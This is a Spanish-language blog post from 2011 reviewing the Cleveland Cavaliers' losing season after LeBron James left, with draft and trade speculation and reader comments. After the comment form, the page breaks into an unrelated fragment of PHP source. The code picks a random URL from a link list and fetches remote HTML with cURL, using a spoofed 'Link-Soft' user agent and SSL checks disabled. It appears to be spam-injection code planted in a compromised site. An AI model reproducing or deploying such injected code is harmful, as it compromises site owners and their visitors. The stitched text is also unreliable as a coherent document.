Cleveland Cavaliers: Muy deficiente

16 de June de 2011 por txusma

La temporada de los Cavs ha estado marcado por ‘The Decision’, el show que montó Lebron James para anunciar al mundo en qué equipo jugaría la temporada 2010-2011. En 20 minutos, Lebron James pasó de ser un héroe en la franquicia de Ohio a ser el personaje más odiado y los Cavs, de ser uno de los máximos contendientes por el anillo a sumirse en las tinieblas de la incertidumbre.

Ninguna franquicia se hubiera recuperado rápidamente de un golpe similar al que ha supuesto el adiós de Lebron y menos si tus 3, teóricamente, mejores jugadores (Varejao, Jamison, Williams) sufren lesiones durante buena parte de la temporada. Los Cavs han acabado con el segundo peor balance de la temporada (19-63), han igualado el récord de mayor número de derrotas consecutivas de cualquier equipo de cualquier liga profesional de los EEUU (26) y han sufrido una de las mayores derrotas de todos los tiempos al caer por 55 puntos de diferencia ante Los Angeles Lakers. Una temporada para olvidar.

Por suerte, el azar personalizado en el hijo de Danny Gilbert puede haber echado una mano providencial a los Cavs acortando ostensiblemente su travesía por el desierto.

Lo mejor: La implicación de Baron Davis y los buenos fichajes realizados durante la temporada (Sessions, Harangody, Erden). La aparición de JJ Hickson. Las buenas expectativas gracias a las elecciones 1 y 4 del draft.

Lo peor: El estado de rencor permanente que ha mantenido la franquicia hacia Lebron toda la temporada. Cuando empiecen a olvidarle darán un paso al frente. Los récords negativos que quedarán para la historia.

Jugando a GM:

Este año toca centrarse en el draft. Parece una buena idea moverse para conseguir el número 2 gracias a la trade exception de la que gozan los Cavs después del sign and trade de Lebron James. Con estas dos elecciones las cosas están claras: Escogería a Kyrie Irving y Derrick Williams.

Si al final los Cavs se quedan con las elecciones 1 y 4, ¿qué hacer? Dejar escapar a Irving parece un pecado pero en su posición los Cavs tienen a un Baron Davis, que no ha jugado del todo mal, y Ramon Sessions. En cambio, la posición de 3 es un verdadero desierto y allí Derrick Williams podría hacer carrera. Además a la elección número 4 llegarían Brandon Knight o Kemba Walker. Yo apostaría de todas maneras por Kyrie Irving en la primera elección y Enes Kanter en la cuarta. Si Kanter no llega, me la jugaría por Kawhi Leonard o Jan Vesely para llenar el hueco en la posición de 3. La opción Valanciunas me deja muy frío.

Con Irving, la situación de Baron Davis se asemeja un poco a la de Gilbert Arenas en los Wizards tras la elección de John Wall. Una posible salida podría ser un traspaso Davis- RIP Hamilton que equilibraría las plantillas de los dos equipos.

– Vía Mid Level podrían hacerse con algún pívot nato si es que no se escogen a Kanter. Greg Oden, Samuel Dalembert o Spencer Hawes parecen los mejores candidatos. De todas maneras con un equipo tan joven tampoco creo que sea un factor decisivo y podrían tirar de Hickson y Varejao.

Los Cavs poseen una trade exception que, de no utilizar para hacerse con el número 2 del draft, podría usar para conseguir un alero de garantías. A lo mejor se podría pescar a Rudy Gay gracias a las dudas que se han despertado en Memphis por la buena actuación del equipo en Playoffs sin su presencia. La opción Iguodala parece más complicada porque los Sixers buscan jugadores a cambio que les permitan consolidar el equipo.

Comenta

6 comentarios a esta entrada

  1. Cocinitas dice:
    #1

    Creo que los Cavs han tenido mucha suerte con este draft si al final consiguen los pick 1y2 como creo que conseguiran ya que si eligen a Irving y Derrick Williams les quedaria un equipo compensado y joven. Yo apostaria por tanto por el traspaso de Baron Davis a cambio de un escolta de garantias Rip hamilton, Monta Ellis (dificil claro), Jason Richardson, etc. Aun sin escolta creo que sus victorias subiran mucho el año que viene más si cabe contando que estan en la conferencia este. A mi parecer este seria un buen proyecto para volver a playoffs en pocos años.

      Citar

  2. TheDeerHunter dice:
    #2

    Te olvidas de un “lo mejor”… que ha sido el batacazo del ex-king al final y el cachondeo posterior. Allí se pegaron una fiestaca que no envidia a la que se hubieran pegado ganando un anillo. XD

    Después, al parecer sí están intentando hacer hueco para Irving… y diría que no lo tienen mal al menos en lo que se refiere a Sessions, que vuelve a tener buen cartel y no es caro. Quizá también pudiera cuajar lo de DavisxHamilton.
    Sin embargo me parece muy extraño que Minnesotta trague así como así con ese expiring. El problema de ellos no es económico a corto plazo y tampoco ubico demasiado bien cómo podrían utilizar a Jamison en ese equipo. Quizá para utilizarlo como moneda de cambio de inmediato… no sabría decir.

    Lo de las Mid-Level que comentas y lo del alero de garantías sí lo veo bastante más remoto. Ni me parecen Mid-Levels los pívots que has mencionado (viendo lo que se está pagando por los hombres altos) ni me parece que Sixers o Memphis vayan a vender barato a sus aleros.

    Dicho todo esto podría quedar algo así:
    – Irving/Gibson/Manny Harris
    – Hamilton/Eyenga/Gee
    – Derrick Williams/Harangody
    – Hickson/Varejao/Samardo
    – Hollins/Erden

    Ya pueden ser buenos los rookies, ya… y ya se pueden dar con un canto en los dientes el año que viene con pasar las 20 victorias.

      Citar

  3. Cocinitas dice:
    #3

    Hombre yo creo que con ese equipo que mencionas y en la conferencia este si deberian pasar de las 20 victorias sin problemas, y me parece un buen equipo de futuro la verdad.

      Citar

  4. TheDeerHunter dice:
    #4

    Bueno, es que no conozco lo suficiente a Irving y a Williams para pensar en un salto de calidad significativo descontando la pérdida de Davis, Sessions y Jamison. Tampoco voy a entrar en esa perspectiva de futuro que mencionas (me da que, por muy buenos que sean ellos, tendría que haber algo más ahí para tomarlos en serio)

    Suponiendo que los dos puedan aportar de inmediato (y es mucho suponer) en esa plantilla únicamente veo solvencia en 4-5 tíos ahora mismo. Habrá que ver qué es lo que se van a encontrar concretamente en el Este para pensar en más de 20 victorias. Mientras no se demuestre lo contrario no veo mucho mejor equipo que a principio del pasado curso.

      Citar

  5. Txusma dice:
    #5

    Yo estoy con Deer en que el primer año sera muy duro y que dificilmente pasarán holgados las 20 victorias si es que las rebasan. De todas maneras, a poco que Irving y Williams salgan medio buenos, son buenos cimientos (junto a Hickson) para construir. En 2-3 años pueden atraer buenos veteranos y afianzar el equipo. Eso sí, 2-3 años de travesía por el desierto no se la qita nadie.

      Citar

  6. Blade Petrovic dice:
    #6

    Pero lo mejor del curso de los Cavs es que han ganado Dos de los 10 mejores equipos de la liga.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>